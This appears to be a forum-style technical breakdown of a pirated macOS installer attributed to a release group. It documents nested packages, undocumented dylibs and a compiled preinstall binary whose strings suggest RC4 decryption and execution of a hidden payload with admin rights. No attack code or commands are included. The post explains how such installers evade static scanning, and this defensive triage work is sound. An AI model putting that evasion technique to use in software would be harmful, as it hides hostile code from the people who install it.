Technical breakdown of what's actually inside the Monter Group macOS installer
Technical breakdown of what's actually inside a Monter Group macOS installer
Monter Group is frequently cited on piracy forums as a trusted source for macOS software. This post isn't about whether that reputation is deserved. It's a layer-by-layer breakdown of what one of their installers actually contains at a technical level, so people can make an informed decision rather than relying on forum vouches alone.
The file structure
The ISO mounts as a virtual drive containing:
- A
.pkginstaller — the main installer - Several
.weblocfiles linking to Monter Group's other releases Инструкция.webloc— Russian for 'Instructions', pointing to an external online guide rather than bundling one locally
Why standard antivirus scans miss most of this
Running ClamAV (or any scanner) directly on the ISO or the mounted volume returns almost nothing meaningful — only 4 MB scanned out of a 3.8 GB file. The reason is that the PKG installer is treated as a single opaque blob. The scanner reads the container, not the contents.
To actually reach the application files, the PKG needs to be expanded using pkgutil --expand. Once that's done, the scan reaches 232 MB of content and the full file tree becomes visible.
The SHA-256 hash of the main DMG returns no results on VirusTotal — the file is entirely unknown to their database. The file is also too large (3.8 GB) to submit directly for a full scan.
The _runtime folder
Inside the expanded package, under Scripts/_runtime/, are the following files — none of which belong to the legitimate software being installed:
[Brand-name] Keychain Fixer v0.15 [Monter Group].pkg
[Brand-name]IPCBox [Monter Group].pkg
CCXP v5.2.4.1 [Monter Group].pkg
HDPIM.dylib
HDZIP.dylib
the_unpacker
arm64
x86_64
preinstall
Keychain-touching component — The macOS Keychain stores passwords, authentication tokens, and certificates system-wide. Whether this component goes beyond licence validation is unknown.
Three nested PKGs — More installers within the installer, each from Monter Group. Each would require another round of unpacking to inspect further.
HDPIM.dylib and HDZIP.dylib — Custom dynamic libraries, not part of the legitimate software's codebase. Purpose undocumented.
the_unpacker, arm64, x86_64 — Bare compiled binaries, built separately for Apple Silicon and Intel. No documentation of purpose.
The preinstall file — the most significant finding
On a standard macOS PKG installer, preinstall is always a shell script. Shell scripts are plain text. You can read them before running anything and know exactly what they will do.
In this package, preinstall is a compiled binary executable, not a shell script.
Reading its embedded strings reveals the following symbols:
arc4
key
key_with_file
chkenv
xsh
execvp
getenv
putenv
environ
getpid
What these indicate:
arc4— RC4 stream cipher. The binary contains an encryption/decryption routine.key_with_file— It reads a decryption key from another file in the package.execvp— It executes a child process.getenv/putenv— It reads and modifies environment variables.
In plain terms: this binary runs with administrator privileges at install time, reads a key from another bundled file, decrypts a payload that does not exist in readable form anywhere on disk, and executes it.
This is why static analysis finds nothing. The actual behaviour of the installer is not present in any file that can be scanned. It only materialises at runtime, after the binary has already been granted elevated access to your system.
Why this matters
A legitimate installer has no reason to:
- Use a compiled binary instead of a shell script for its preinstall hook
- Embed a cryptographic cipher
- Decrypt and execute a hidden payload at runtime
These are techniques associated with evasion of static analysis. They do not appear in legitimate software installers.
This does not prove the installer is malicious. It proves that no available scanning method can determine what it does, because the relevant code is hidden until the moment it runs with admin privileges on your machine.
Forum users reporting no issues after installation is not evidence of safety — it is evidence that nothing obviously broke. Those are different things.
Summary
| What was checked | Result |
|---|---|
| ClamAV scan of ISO / mounted volume | Effectively 0 bytes of application content scanned |
| ClamAV scan of expanded PKG | 232 MB scanned, 0 detections |
| VirusTotal hash lookup | File completely unknown |
| VirusTotal direct upload | Not possible — file too large |
preinstall script |
Compiled binary, not a shell script |
preinstall content |
RC4 cipher, runtime decryption, child process execution |
| Custom dylibs and binaries | Undocumented, not part of the legitimate software's codebase |
| Keychain-touching component | Present |
Make of that what you will.